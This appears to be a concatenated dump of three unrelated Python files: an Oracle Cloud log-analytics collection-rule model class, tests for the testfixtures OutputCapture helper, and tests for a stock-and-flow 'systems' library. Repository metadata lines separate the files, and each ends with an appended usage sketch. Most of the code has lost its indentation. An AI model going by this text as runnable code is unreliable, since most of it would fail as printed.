from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateLogAnalyticsObjectCollectionRuleDetails(object):
"""
The configuration details of collection rule to enable automatic log collection from an object storage bucket.
"""
#: A constant which can be used with the collection_type property of a CreateLogAnalyticsObjectCollectionRuleDetails.
#: This constant has a value of "LIVE"
COLLECTION_TYPE_LIVE = "LIVE"
#: A constant which can be used with the collection_type property of a CreateLogAnalyticsObjectCollectionRuleDetails.
#: This constant has a value of "HISTORIC"
COLLECTION_TYPE_HISTORIC = "HISTORIC"
#: A constant which can be used with the collection_type property of a CreateLogAnalyticsObjectCollectionRuleDetails.
#: This constant has a value of "HISTORIC_LIVE"
COLLECTION_TYPE_HISTORIC_LIVE = "HISTORIC_LIVE"
def __init__(self, **kwargs):
"""
Initializes a new CreateLogAnalyticsObjectCollectionRuleDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param name:
The value to assign to the name property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type name: str
:param description:
The value to assign to the description property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type description: str
:param compartment_id:
The value to assign to the compartment_id property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type compartment_id: str
:param os_namespace:
The value to assign to the os_namespace property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type os_namespace: str
:param os_bucket_name:
The value to assign to the os_bucket_name property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type os_bucket_name: str
:param collection_type:
The value to assign to the collection_type property of this CreateLogAnalyticsObjectCollectionRuleDetails.
Allowed values for this property are: "LIVE", "HISTORIC", "HISTORIC_LIVE"
:type collection_type: str
:param poll_since:
The value to assign to the poll_since property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type poll_since: str
:param poll_till:
The value to assign to the poll_till property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type poll_till: str
:param log_group_id:
The value to assign to the log_group_id property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type log_group_id: str
:param log_source_name:
The value to assign to the log_source_name property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type log_source_name: str
:param entity_id:
The value to assign to the entity_id property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type entity_id: str
:param char_encoding:
The value to assign to the char_encoding property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type char_encoding: str
:param is_enabled:
The value to assign to the is_enabled property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type is_enabled: bool
:param overrides:
The value to assign to the overrides property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type overrides: dict(str, list[PropertyOverride])
:param object_name_filters:
The value to assign to the object_name_filters property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type object_name_filters: list[str]
:param defined_tags:
The value to assign to the defined_tags property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type defined_tags: dict(str, dict(str, object))
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type freeform_tags: dict(str, str)
"""
self.swagger_types = {
'name': 'str',
'description': 'str',
'compartment_id': 'str',
'os_namespace': 'str',
'os_bucket_name': 'str',
'collection_type': 'str',
'poll_since': 'str',
'poll_till': 'str',
'log_group_id': 'str',
'log_source_name': 'str',
'entity_id': 'str',
'char_encoding': 'str',
'is_enabled': 'bool',
'overrides': 'dict(str, list[PropertyOverride])',
'object_name_filters': 'list[str]',
'defined_tags': 'dict(str, dict(str, object))',
'freeform_tags': 'dict(str, str)'
}
self.attribute_map = {
'name': 'name',
'description': 'description',
'compartment_id': 'compartmentId',
'os_namespace': 'osNamespace',
'os_bucket_name': 'osBucketName',
'collection_type': 'collectionType',
'poll_since': 'pollSince',
'poll_till': 'pollTill',
'log_group_id': 'logGroupId',
'log_source_name': 'logSourceName',
'entity_id': 'entityId',
'char_encoding': 'charEncoding',
'is_enabled': 'isEnabled',
'overrides': 'overrides',
'object_name_filters': 'objectNameFilters',
'defined_tags': 'definedTags',
'freeform_tags': 'freeformTags'
}
self._name = None
self._description = None
self._compartment_id = None
self._os_namespace = None
self._os_bucket_name = None
self._collection_type = None
self._poll_since = None
self._poll_till = None
self._log_group_id = None
self._log_source_name = None
self._entity_id = None
self._char_encoding = None
self._is_enabled = None
self._overrides = None
self._object_name_filters = None
self._defined_tags = None
self._freeform_tags = None
@property
def name(self):
"""
**[Required]** Gets the name of this CreateLogAnalyticsObjectCollectionRuleDetails.
A unique name given to the rule. The name must be unique within the tenancy, and cannot be modified.
:return: The name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this CreateLogAnalyticsObjectCollectionRuleDetails.
A unique name given to the rule. The name must be unique within the tenancy, and cannot be modified.
:param name: The name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._name = name
@property
def description(self):
"""
Gets the description of this CreateLogAnalyticsObjectCollectionRuleDetails.
A string that describes the details of the rule. It does not have to be unique, and can be changed.
Avoid entering confidential information.
:return: The description of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this CreateLogAnalyticsObjectCollectionRuleDetails.
A string that describes the details of the rule. It does not have to be unique, and can be changed.
Avoid entering confidential information.
:param description: The description of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._description = description
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
The `OCID`__ of the compartment to which this rule belongs.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
The `OCID`__ of the compartment to which this rule belongs.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def os_namespace(self):
"""
**[Required]** Gets the os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
Object Storage namespace.
:return: The os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._os_namespace
@os_namespace.setter
def os_namespace(self, os_namespace):
"""
Sets the os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
Object Storage namespace.
:param os_namespace: The os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._os_namespace = os_namespace
@property
def os_bucket_name(self):
"""
**[Required]** Gets the os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Object Storage bucket.
:return: The os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._os_bucket_name
@os_bucket_name.setter
def os_bucket_name(self, os_bucket_name):
"""
Sets the os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Object Storage bucket.
:param os_bucket_name: The os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._os_bucket_name = os_bucket_name
@property
def collection_type(self):
"""
Gets the collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
The type of collection.
Allowed values for this property are: "LIVE", "HISTORIC", "HISTORIC_LIVE"
:return: The collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._collection_type
@collection_type.setter
def collection_type(self, collection_type):
"""
Sets the collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
The type of collection.
:param collection_type: The collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
allowed_values = ["LIVE", "HISTORIC", "HISTORIC_LIVE"]
if not value_allowed_none_or_none_sentinel(collection_type, allowed_values):
raise ValueError(
"Invalid value for `collection_type`, must be None or one of {0}"
.format(allowed_values)
)
self._collection_type = collection_type
@property
def poll_since(self):
"""
Gets the poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
The oldest time of the file in the bucket to consider for collection.
        Accepted values are: BEGINNING, CURRENT_TIME, or an RFC3339-formatted datetime string.
        Use this for HISTORIC or HISTORIC_LIVE collection types. When collectionType is LIVE, specifying a pollSince value other than CURRENT_TIME will result in an error.
:return: The poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._poll_since
@poll_since.setter
def poll_since(self, poll_since):
"""
Sets the poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
The oldest time of the file in the bucket to consider for collection.
        Accepted values are: BEGINNING, CURRENT_TIME, or an RFC3339-formatted datetime string.
        Use this for HISTORIC or HISTORIC_LIVE collection types. When collectionType is LIVE, specifying a pollSince value other than CURRENT_TIME will result in an error.
:param poll_since: The poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._poll_since = poll_since
@property
def poll_till(self):
"""
Gets the poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
The newest time of the file in the bucket to consider for collection.
        Accepted values are: CURRENT_TIME or an RFC3339-formatted datetime string.
        Use this for the HISTORIC collection type. When collectionType is LIVE or HISTORIC_LIVE, specifying pollTill will result in an error.
:return: The poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._poll_till
@poll_till.setter
def poll_till(self, poll_till):
"""
Sets the poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
The newest time of the file in the bucket to consider for collection.
        Accepted values are: CURRENT_TIME or an RFC3339-formatted datetime string.
        Use this for the HISTORIC collection type. When collectionType is LIVE or HISTORIC_LIVE, specifying pollTill will result in an error.
:param poll_till: The poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._poll_till = poll_till
@property
def log_group_id(self):
"""
**[Required]** Gets the log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics Log group OCID to associate the processed logs with.
:return: The log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""
Sets the log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics Log group OCID to associate the processed logs with.
:param log_group_id: The log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._log_group_id = log_group_id
@property
def log_source_name(self):
"""
**[Required]** Gets the log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Logging Analytics Source to use for the processing.
:return: The log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._log_source_name
@log_source_name.setter
def log_source_name(self, log_source_name):
"""
Sets the log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Logging Analytics Source to use for the processing.
:param log_source_name: The log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._log_source_name = log_source_name
@property
def entity_id(self):
"""
Gets the entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics entity OCID. Associates the processed logs with the given entity (optional).
:return: The entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._entity_id
@entity_id.setter
def entity_id(self, entity_id):
"""
Sets the entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics entity OCID. Associates the processed logs with the given entity (optional).
:param entity_id: The entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._entity_id = entity_id
@property
def char_encoding(self):
"""
Gets the char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
An optional character encoding to aid in detecting the character encoding of the contents of the objects while processing.
        It is recommended to set this value to ISO_8859_1 when the contents of the objects are mostly numeric
        with very few alphabetic characters; for example, this applies when configuring VCN Flow Logs.
:return: The char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._char_encoding
@char_encoding.setter
def char_encoding(self, char_encoding):
"""
Sets the char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
An optional character encoding to aid in detecting the character encoding of the contents of the objects while processing.
        It is recommended to set this value to ISO_8859_1 when the contents of the objects are mostly numeric
        with very few alphabetic characters; for example, this applies when configuring VCN Flow Logs.
:param char_encoding: The char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._char_encoding = char_encoding
@property
def is_enabled(self):
"""
Gets the is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
Whether or not this rule is currently enabled.
:return: The is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: bool
"""
return self._is_enabled
@is_enabled.setter
def is_enabled(self, is_enabled):
"""
Sets the is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
Whether or not this rule is currently enabled.
:param is_enabled: The is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: bool
"""
self._is_enabled = is_enabled
@property
def overrides(self):
"""
Gets the overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
The override is used to modify some important configuration properties for objects matching a specific pattern inside the bucket.
        Supported properties for override are: logSourceName, charEncoding, entityId.
        The supported matchType for override is \"contains\".
:return: The overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: dict(str, list[PropertyOverride])
"""
return self._overrides
@overrides.setter
def overrides(self, overrides):
"""
Sets the overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
The override is used to modify some important configuration properties for objects matching a specific pattern inside the bucket.
        Supported properties for override are: logSourceName, charEncoding, entityId.
        The supported matchType for override is \"contains\".
:param overrides: The overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: dict(str, list[PropertyOverride])
"""
self._overrides = overrides
@property
def object_name_filters(self):
"""
Gets the object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
When the filters are provided, only the objects matching the filters are picked up for processing.
The matchType supported is exact match and accommodates wildcard \"*\".
For more information on filters, see `Event Filters`__.
__ https://docs.oracle.com/en-us/iaas/Content/Events/Concepts/filterevents.htm
:return: The object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: list[str]
"""
return self._object_name_filters
@object_name_filters.setter
def object_name_filters(self, object_name_filters):
"""
Sets the object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
When the filters are provided, only the objects matching the filters are picked up for processing.
The matchType supported is exact match and accommodates wildcard \"*\".
For more information on filters, see `Event Filters`__.
__ https://docs.oracle.com/en-us/iaas/Content/Events/Concepts/filterevents.htm
:param object_name_filters: The object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: list[str]
"""
self._object_name_filters = object_name_filters
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:return: The defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:param defined_tags: The defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:return: The freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:param freeform_tags: The freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
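# --- Hedged usage sketch (not part of the generated model above) ---
# A minimal illustration, based only on the property docstrings in this class,
# of populating the details object for a HISTORIC collection: pollSince and
# pollTill take RFC3339 strings, and pollTill is only meaningful for HISTORIC.
# All OCIDs, names, and the log source below are placeholders, not real values.
if __name__ == "__main__":
    details = CreateLogAnalyticsObjectCollectionRuleDetails()
    details.name = "historic-vcn-flow-logs"
    details.description = "One-off backfill of VCN flow logs"
    details.compartment_id = "ocid1.compartment.oc1..exampleuniqueid"          # placeholder
    details.os_namespace = "examplenamespace"                                  # placeholder
    details.os_bucket_name = "vcn-flow-logs"                                   # placeholder
    details.collection_type = "HISTORIC"      # setter validates against allowed_values
    details.poll_since = "2021-01-01T00:00:00Z"
    details.poll_till = "2021-02-01T00:00:00Z"
    details.log_group_id = "ocid1.loganalyticsloggroup.oc1..exampleuniqueid"   # placeholder
    details.log_source_name = "Example VCN Flow Logs Source"                   # placeholder
    details.char_encoding = "ISO_8859_1"      # suggested above for mostly numeric content
    details.is_enabled = True
    details.object_name_filters = ["*flow-logs*"]
    print(details)                            # __repr__ renders via formatted_flat_dict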
|
testfixtures/tests/test_outputcapture.py
|
abcdenis/testfixtures
| 184 |
89104
|
from __future__ import print_function
import sys
from subprocess import call
from unittest import TestCase
from testfixtures import OutputCapture, compare
from .test_compare import CompareHelper
class TestOutputCapture(CompareHelper, TestCase):
def test_compare_strips(self):
with OutputCapture() as o:
print(' Bar! ')
o.compare('Bar!')
def test_compare_doesnt_strip(self):
with OutputCapture(strip_whitespace=False) as o:
print(' Bar! ')
self.check_raises(
'\tBar!',
compare=o.compare,
message="'\\tBar!' (expected) != ' Bar! \\n' (actual)",
)
def test_stdout_and_stderr(self):
with OutputCapture() as o:
print('hello', file=sys.stdout)
print('out', file=sys.stderr)
print('there', file=sys.stdout)
print('now', file=sys.stderr)
o.compare("hello\nout\nthere\nnow\n")
def test_unicode(self):
with OutputCapture() as o:
print(u'\u65e5', file=sys.stdout)
o.compare(u'\u65e5\n')
def test_separate_capture(self):
with OutputCapture(separate=True) as o:
print('hello', file=sys.stdout)
print('out', file=sys.stderr)
print('there', file=sys.stdout)
print('now', file=sys.stderr)
o.compare(stdout="hello\nthere\n",
stderr="out\nnow\n")
def test_compare_both_at_once(self):
with OutputCapture(separate=True) as o:
print('hello', file=sys.stdout)
print('out', file=sys.stderr)
self.check_raises(
stdout="out\n",
stderr="hello\n",
compare=o.compare,
message=(
'dict not as expected:\n'
'\n'
'values differ:\n'
"'stderr': 'hello' (expected) != 'out' (actual)\n"
"'stdout': 'out' (expected) != 'hello' (actual)\n"
'\n'
"While comparing ['stderr']: 'hello' (expected) != 'out' (actual)\n"
'\n'
"While comparing ['stdout']: 'out' (expected) != 'hello' (actual)"
),
)
def test_original_restore(self):
o_out, o_err = sys.stdout, sys.stderr
with OutputCapture() as o:
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
def test_double_disable(self):
o_out, o_err = sys.stdout, sys.stderr
with OutputCapture() as o:
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
o.disable()
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
o.disable()
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
def test_double_enable(self):
o_out, o_err = sys.stdout, sys.stderr
with OutputCapture() as o:
o.disable()
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
o.enable()
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
o.enable()
self.assertFalse(sys.stdout is o_out)
self.assertFalse(sys.stderr is o_err)
self.assertTrue(sys.stdout is o_out)
self.assertTrue(sys.stderr is o_err)
class TestOutputCaptureWithDescriptors(object):
def test_fd(self, capfd):
with capfd.disabled(), OutputCapture(fd=True) as o:
call([sys.executable, '-c', "import sys; sys.stdout.write('out')"])
call([sys.executable, '-c', "import sys; sys.stderr.write('err')"])
compare(o.captured, expected=b'outerr')
o.compare(expected=b'outerr')
def test_fd_separate(self, capfd):
with capfd.disabled(), OutputCapture(fd=True, separate=True) as o:
call([sys.executable, '-c', "import sys; sys.stdout.write('out')"])
call([sys.executable, '-c', "import sys; sys.stderr.write('err')"])
compare(o.captured, expected=b'')
o.compare(stdout=b'out', stderr=b'err')
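# --- Hedged usage sketch (not one of the repository's tests) ---
# A standalone illustration of the context-manager pattern exercised above:
# by default OutputCapture merges stdout and stderr into one stream and
# compare() strips surrounding whitespace, while separate=True keeps the two
# streams apart and compare() takes stdout=/stderr= keyword arguments.
if __name__ == '__main__':
    with OutputCapture() as combined:
        print('status: ok')
        print('warning: low disk', file=sys.stderr)
    combined.compare('status: ok\nwarning: low disk')

    with OutputCapture(separate=True) as split:
        print('status: ok')
        print('warning: low disk', file=sys.stderr)
    split.compare(stdout='status: ok\n', stderr='warning: low disk\n')
    print('sketch assertions passed')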
|
tests/test_systems.py
|
ShaunMerritt/systems
| 203 |
89124
|
"Test systems.py"
import unittest
from systems.errors import IllegalSourceStock
import systems.models
import systems.parse
import systems.lexer
class TestModels(unittest.TestCase):
def test_stock_maximum_rate(self):
m = systems.models.Model("Maximum")
a = m.infinite_stock("a")
b_max = 3
b = m.stock("b", systems.models.Formula(0), systems.models.Formula(b_max))
m.flow(a, b, systems.models.Rate(1))
results = m.run()
for i, result in enumerate(results):
if i > b_max:
self.assertEqual(b_max, result['b'])
def test_illegal_conversion_leak_source(self):
"You can't apply a Conversion or Leak to an infinite stock."
m = systems.models.Model("Maximum")
a = m.infinite_stock("a")
b = m.stock("b")
rates = [systems.models.Conversion(0.25), systems.models.Leak(0.25)]
for rate in rates:
with self.assertRaises(IllegalSourceStock):
m.flow(a, b, rate)
def test_infinite_destination_stock(self):
"Should allow infinite stocks as destinations stock for all rates."
rates = [systems.models.Rate(5), systems.models.Conversion(0.25), systems.models.Leak(0.25)]
for rate in rates:
m = systems.models.Model("Maximum")
a = m.stock("a", systems.models.Formula("100"))
b = m.infinite_stock("b")
m.flow(a, b, rate)
m.run(rounds=3)
def test_stock_maximum_conversion(self):
m = systems.models.Model("Maximum")
a_initial = 10
a = m.stock("a", systems.models.Formula(a_initial))
b_max = 3
b = m.stock("b", 0, systems.models.Formula(b_max))
f_rate = 0.5
m.flow(a, b, systems.models.Conversion(f_rate))
results = m.run(rounds=3)
final = results[-1]
self.assertEqual(b_max, final['b'])
# 10 - ((1 / 0.5) * 3) = 4
a_expected = a_initial - ((1 / f_rate) * b_max)
self.assertEqual(a_expected, final['a'])
def test_stock_maximum_leak(self):
m = systems.models.Model("Maximum")
a_initial = 10
a = m.stock("a", systems.models.Formula(a_initial))
b_max = 3
b = m.stock("b", systems.models.Formula(0), systems.models.Formula(b_max))
m.flow(a, b, systems.models.Leak(0.5))
results = m.run(rounds=2)
final = results[-1]
self.assertEqual(b_max, final['b'])
self.assertEqual(a_initial - b_max, final['a'])
def test_stock_minimums(self):
"Stocks should never dip below their minimum value."
m = systems.models.Model("Minimum")
a = m.stock("a", systems.models.Formula(2))
b = m.stock("b", systems.models.Formula(0))
m.flow(a,b, systems.models.Rate(1))
results = m.run(rounds=5)
final = results[-1]
self.assertEqual(0, final['a'])
self.assertEqual(2, final['b'])
def test_stock_negative_flows(self):
"Stocks should never dip below their minimum value."
m = systems.models.Model("Minimum")
c = m.stock("c", systems.models.Formula(2))
a = m.stock("a", systems.models.Formula(5))
b = m.stock("b", systems.models.Formula(0))
m.flow(a,b, systems.models.Rate("c"))
results = m.run(rounds=5)
final = results[-1]
self.assertEqual(0, final['a'])
self.assertEqual(5, final['b'])
def test_partial_fulfillment_rate(self):
m = systems.models.Model("Partial")
a = m.stock("a", systems.models.Formula(5))
b = m.stock("b", systems.models.Formula(0))
systems.parse.parse_flow(m, a, b, "10")
results = m.run(rounds=3)
final = results[-1]
self.assertEqual(0, final['a'])
self.assertEqual(5, final['b'])
def test_formula_rate(self):
m = systems.models.Model("Maximum")
a = m.infinite_stock("a")
b = m.stock("b")
c = m.stock("c")
d = m.stock("d", systems.models.Formula(3))
systems.parse.parse_flow(m, a, b, "d * 2")
systems.parse.parse_flow(m, b, c, "d")
results = m.run(rounds=3)
final = results[-1]
self.assertEqual(12, final['b'])
self.assertEqual(6, final['c'])
class TestFormula(unittest.TestCase):
def test_simple_formulas(self):
cases = [
("0", 0),
("0.5", 0.5),
("100", 100),
("inf", float("+inf")),
]
for case_in, case_out in cases:
lexed = systems.lexer.lex_formula(case_in)
formula = systems.models.Formula(lexed)
self.assertEqual(case_out, formula.compute())
def test_reference_formulas(self):
state = {'a': 10, 'b': 5, 'c': 0}
cases = [
("a", 10),
("b", 5),
("c", 0),
("a * 2", 20),
("b * 3", 15),
("c * 10", 0),
("2 * a", 20),
("3 * b", 15),
("10 * c", 0),
("b * a", 50),
("a * b", 50),
("b * b", 25),
("c * a", 0),
]
for case_in, case_out in cases:
lexed = systems.lexer.lex_formula(case_in)
formula = systems.models.Formula(lexed)
self.assertEqual(case_out, formula.compute(state))
if __name__ == "__main__":
unittest.main()
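# --- Hedged usage sketch (not one of the repository's tests) ---
# A standalone walk-through of the model API exercised in TestModels, kept in a
# function so importing this module never runs it. It mirrors
# test_stock_maximum_conversion: a Conversion(0.5) drains two units of "a" for
# every unit that reaches "b", so filling "b" to its maximum of 3 costs "a" six.
def _example_conversion_walkthrough():
    m = systems.models.Model("Example")
    a = m.stock("a", systems.models.Formula(10))
    b = m.stock("b", systems.models.Formula(0), systems.models.Formula(3))
    m.flow(a, b, systems.models.Conversion(0.5))
    final = m.run(rounds=3)[-1]
    assert final['b'] == 3
    assert final['a'] == 10 - (1 / 0.5) * 3  # == 4
    return final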
|